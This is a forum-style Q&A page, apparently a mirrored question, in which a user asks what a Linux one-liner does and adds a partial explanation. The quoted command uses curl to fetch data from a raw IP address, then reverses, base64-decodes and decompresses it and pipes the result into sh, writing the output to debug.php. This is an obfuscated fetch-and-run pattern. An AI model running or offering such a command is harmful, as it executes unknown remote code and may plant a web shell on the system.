简体   繁体   中英

What does this line of command line in Linux mean?

So I have this line of command line in Linux and I want to know what does this mean/do in details

"curl -s http://206.189.242.131/data | tac | base64 -d | gzip -d | sh > debug.php"

Thanks for help!

  • -s is no error pop up,

  • curl command: client url => doing a http request to fetch data from 206.189.242.131/data

for the rest idk, pipe essentially takes the output from previous command and gets used in the second "|"

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM